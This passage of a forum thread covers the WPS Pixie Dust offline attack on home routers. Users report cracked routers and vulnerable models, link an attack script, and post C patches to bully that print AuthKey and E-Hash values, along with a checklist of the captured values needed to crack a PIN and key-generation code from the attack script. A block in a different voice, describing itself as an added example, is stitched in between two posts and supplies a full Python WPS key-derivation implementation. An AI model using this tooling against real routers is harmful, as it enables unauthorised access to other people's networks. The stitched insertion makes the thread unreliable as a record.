
Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #71
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    517
    @everyone There is NO official and complete tool available yet. Stop asking. When it is available, one of us will make a post.

  2. #72
    Senior Member
    Join Date
    Mar 2015
    Posts
    141
    @dudux was the realtek.cap file what you used to make wpsOffline.py? Unless I'm doing it wrong, I'm not getting the same PKE, PKR, or any of it.

  3. #73
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    517
    SMCD3GNV and WRT160Nv2 confirmed vulnerable!

  4. #74
    N4 Nethunter
    Guest
    The tool works, I have corrected the code now.
    @sorox2212

    cracked 3 routers
    and all of them were right

  5. #75
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    517
    Can you post the model numbers, manufacturers, and hardware numbers so I can add it to the database?

  6. #76
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    517
    Dudu has asked me to post a python implementation for Ralink devices! You can get it here: https://bitbucket.org/dudux/wpsoffli...e.py?at=master

    All credits go to dudu! Look at the help section for the arguments. Good luck and post any successes with models here! Thanks!!!!
    Last edited by soxrok2212; 2015-03-26 at 06:52 PM.

  7. #77
    Senior Member
    Join Date
    Mar 2015
    Posts
    141
    Quote Originally Posted by Lisa Chu View Post
    You need to edit the file and put in your own data. I don't know where the PKR/PKE data is in the packets, that's where I'm stuck.

    Tried the tool and it is giving me
    Code:
     Trying 00000000
    -> 802.11 deauthentication
    -> 802.11 authentication request
    TIMEOUT!!
    But I'm trying against Broadcom and not Ralink; as said above, Broadcom is not implemented yet.

    I hope you guys keep developing this subject, it's very interesting but beyond my personal understanding to put into practice, so I'll have to wait.
    Would it be feasible to add an import-from-cap feature? I guess that would get some testers running. Thanks everyone

    Tried the tool also and it is only giving the same results, but I am trying against a Ralink TP-Link router. Unmodified code does the same.
    Looking through the Wireshark logs, it is attempting to authenticate, but the script isn't recognizing that it is getting a response. I don't really
    know enough about Python to dig into it, more of a Perl guy than Python. Starting to learn it though. Trying to extract the part in wpscrack.py
    that creates the AuthKey and feed it what it wants to spit out the AuthKey, if that's even going to work... From what I am reading about the
    KDK it only partially makes sense to me.

    Tried the modified version of bully also, it just seems to run normally, trying pins and moving on to the next. Still confused on how this is
    supposed to give the AuthKey, which is where I am stuck. I assume it doesn't give it to you automatically, so how do you get it to give
    the AuthKey?

    I can get everything else as it's in plain sight. I have a couple of Ralink routers at my disposal to test this on also.

    Code:
    maingroup.add_argument('-ak', '--AuthKey', type=str, nargs='?', help='AuthKey obtained from wireshark')
    I thought it wasn't obtained from Wireshark and you had to run it through the KDK... That just confused me even more...

  8. #78
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    517
    WPSCrack.py, I guess, only works with Atheros wireless adapters. Try this to get more info; it comes from Hack Forums:

    Code:
    int wpa_debug_level = MSG_INFO; // change it to MSG_DEBUG
    
    2: Or, manually add some prints in the (wpa_supplicant) source. Let's take as an example bully (you could try reaver if you wish):
    - Download the zip file. Unzip it.
    - Go to bully-master/src/wps and open wps_common.c with a text editor.
    - Go to line 122 and add something similar (just a print):
    Code:
        os_memcpy(wps->emsk, keys + WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN,
              WPS_EMSK_LEN);
    
        /****** ADD THIS PART ******/
        printf(" > AuthKey: ");
        int pixiecnt = 0;
        for (; pixiecnt < WPS_AUTHKEY_LEN; pixiecnt++) {
            printf("%02x", *(wps->authkey + pixiecnt));
            if (pixiecnt != WPS_AUTHKEY_LEN - 1) {
                printf(":");
            }
        }
        printf("\n");
        /******/
    
        wpa_hexdump_key(MSG_DEBUG, "WPS: AuthKey",
    
    - Now open wps_registrar.c.
    - Go to line 1719 (inside wps_process_e_hash1 function) and add:
    Code:
        wpa_hexdump(MSG_DEBUG, "WPS: E-Hash1", wps->peer_hash1, WPS_HASH_LEN);
    
        /****** ADD THIS PART ******/
        printf(" > E-Hash1: ");
        int pixiecnt = 0;
        for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
            printf("%02x", *(wps->peer_hash1 + pixiecnt));
            if (pixiecnt != WPS_HASH_LEN - 1) {
                printf(":");
            }
        }
        printf("\n");
        /******/
    
        return 0;
    
    - Then in the function below (inside wps_process_e_hash2) add:
    Code:
        wpa_hexdump(MSG_DEBUG, "WPS: E-Hash2", wps->peer_hash2, WPS_HASH_LEN);
    
        /****** ADD THIS PART ******/
        printf(" > E-Hash2: ");
        int pixiecnt = 0;
        for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
            printf("%02x", *(wps->peer_hash2 + pixiecnt));
            if (pixiecnt != WPS_HASH_LEN - 1) {
                printf(":");
            }
        }
        printf("\n");
        /******/
    
        return 0;
    Then please post this here:

    Code:
    AP Manufacturer:
    Model name/number:
    Chipset: 
    
    N1 Nonce: 
    Authkey: 
    PKE: 
    PKR: 
    E-Hash1: 
    E-Hash2:
    First 3 are optional, last 6 are mandatory to crack.
    Last edited by soxrok2212; 2015-03-26 at 09:20 PM.

  9. #79
    Junior Member
    Join Date
    Apr 2014
    Posts
    8
    Yeah authkey is generated, sorry I just copied&pasted.........

    The code is right here. I guess that the community will release a fresh & quick patch for reaver or bully. Be patient and try to understand the flaw itself!

    Code:
        def gen_keys(self):
            pubkey_enrollee  = self.bignum_unpack(self.PK_E)
            pubkey_registrar = pow(2, self.secret_number, self.prime_int)
            shared_key       = self.bignum_pack(pow(pubkey_enrollee, self.secret_number, self.prime_int), 192)
    
            self.PK_R        = self.bignum_pack(pubkey_registrar, 192)        
            self.RNonce      = os.urandom(16)
            DHKey            = hashlib.sha256(shared_key).digest()
            KDK              = hmac.new(DHKey, self.ENonce + self.EnrolleeMAC + self.RNonce, hashlib.sha256).digest()
            self.AuthKey, self.KeyWrapKey, self.EMSK = self.kdf(KDK, 'Wi-Fi Easy and Secure Key Derivation', [256, 128, 256])
    
            self.R_S1 = '\00' * 16 #random enough
            self.R_S2 = '\00' * 16        
    
            self.PSK1   = hmac.new(self.AuthKey, self.pin[0:4], hashlib.sha256).digest()[:16]
            self.PSK2   = hmac.new(self.AuthKey, self.pin[4:8], hashlib.sha256).digest()[:16]       
            self.RHash1 = hmac.new(self.AuthKey, self.R_S1 + self.PSK1 + self.PK_E + self.PK_R, hashlib.sha256).digest()
            self.RHash2 = hmac.new(self.AuthKey, self.R_S2 + self.PSK2 + self.PK_E + self.PK_R, hashlib.sha256).digest()
    Last edited by dudux; 2015-03-26 at 10:32 PM.
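The gen_keys() excerpt above calls a kdf() method that is not shown, and post #77 asked how the KDK turns into the AuthKey. The following is an added example, not code from this thread or from dudux's wpsoffline.py: it implements the WPS key derivation as specified in the Wi-Fi Simple Configuration spec and hostapd's wps_derive_keys()/wps_kdf() (DHKey = SHA-256 of the packed DH shared secret; KDK = HMAC-SHA-256 over N1 || EnrolleeMAC || N2; then a counter-mode HMAC-SHA-256 KDF with the label string from the snippet, producing 640 bits split into AuthKey, KeyWrapKey and EMSK). The function names (wps_kdf, derive_wps_keys, hexcolon, demo) and all input values are constructed for the demo; a real run would take dh_shared from the DH computation in gen_keys() and the nonces and MAC from the M1/M2 frames.

```python
"""WPS registrar-side key derivation (added example; not from this thread).

Fills in the kdf() step that the posted gen_keys() calls but does not show,
following the WPS spec / hostapd wps_kdf() construction. All inputs in demo()
are constructed for illustration, not captured from any device.
"""
import hashlib
import hmac
import struct

WPS_AUTHKEY_LEN = 32
WPS_KEYWRAPKEY_LEN = 16
WPS_EMSK_LEN = 32
WPS_DH_LEN = 192  # 1536-bit MODP group, packed big-endian (bignum_pack(..., 192))
KDF_LABEL = b"Wi-Fi Easy and Secure Key Derivation"


def wps_kdf(key: bytes, label: bytes, out_len: int) -> bytes:
    """Counter-mode HMAC-SHA256 KDF from the WPS spec (hostapd wps_kdf).

    Block i = HMAC-SHA256(key, BE32(i) || label || BE32(out_len * 8));
    blocks are concatenated and truncated to out_len bytes.
    """
    key_bits = struct.pack(">I", out_len * 8)
    n_blocks = (out_len + 31) // 32
    out = b"".join(
        hmac.new(key, struct.pack(">I", i) + label + key_bits, hashlib.sha256).digest()
        for i in range(1, n_blocks + 1)
    )
    return out[:out_len]


def derive_wps_keys(dh_shared: int, nonce_e: bytes, mac_e: bytes, nonce_r: bytes):
    """DHKey -> KDK -> (AuthKey, KeyWrapKey, EMSK), the same chain gen_keys() runs.

    dh_shared: g^(ab) mod p as an integer (packed to 192 big-endian bytes).
    nonce_e / nonce_r: 16-byte enrollee (N1) and registrar (N2) nonces.
    mac_e: 6-byte enrollee MAC address.
    """
    if len(nonce_e) != 16 or len(nonce_r) != 16 or len(mac_e) != 6:
        raise ValueError("nonces must be 16 bytes and the MAC 6 bytes")
    shared = dh_shared.to_bytes(WPS_DH_LEN, "big")
    dhkey = hashlib.sha256(shared).digest()  # DHKey = SHA-256(g^AB mod p)
    # KDK = HMAC-SHA-256_DHKey(N1 || EnrolleeMAC || N2)
    kdk = hmac.new(dhkey, nonce_e + mac_e + nonce_r, hashlib.sha256).digest()
    total = WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN + WPS_EMSK_LEN  # 80 bytes = 640 bits
    keys = wps_kdf(kdk, KDF_LABEL, total)
    authkey = keys[:WPS_AUTHKEY_LEN]
    keywrapkey = keys[WPS_AUTHKEY_LEN:WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN]
    emsk = keys[WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN:]
    return authkey, keywrapkey, emsk


def hexcolon(b: bytes) -> str:
    """Format bytes as aa:bb:cc, the form the patched bully snippets print."""
    return ":".join(f"{x:02x}" for x in b)


def demo():
    # Constructed inputs (hypothetical values, not from a capture).
    dh_shared = int.from_bytes(hashlib.sha256(b"demo-shared-secret").digest() * 6, "big")
    nonce_e = bytes(range(16))
    nonce_r = bytes(range(16, 32))
    mac_e = bytes.fromhex("001122334455")
    authkey, kwk, emsk = derive_wps_keys(dh_shared, nonce_e, mac_e, nonce_r)
    print(" > AuthKey:   ", hexcolon(authkey))
    print(" > KeyWrapKey:", hexcolon(kwk))
    print(" > EMSK:      ", hexcolon(emsk))
    return authkey, kwk, emsk


if __name__ == "__main__":
    demo()
```

Because the KDF binds the requested output length into every HMAC block, the 80-byte output is not a prefix of a shorter derivation; an implementation that derives AuthKey alone with out_len = 32 will not match hostapd, which is a common source of "wrong AuthKey" confusion when reimplementing this in another language.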

  10. #80
    Junior Member
    Join Date
    Aug 2014
    Posts
    3
    Thanks for the script Dudux, worked for me on a belkin F5D8236-4 v3.
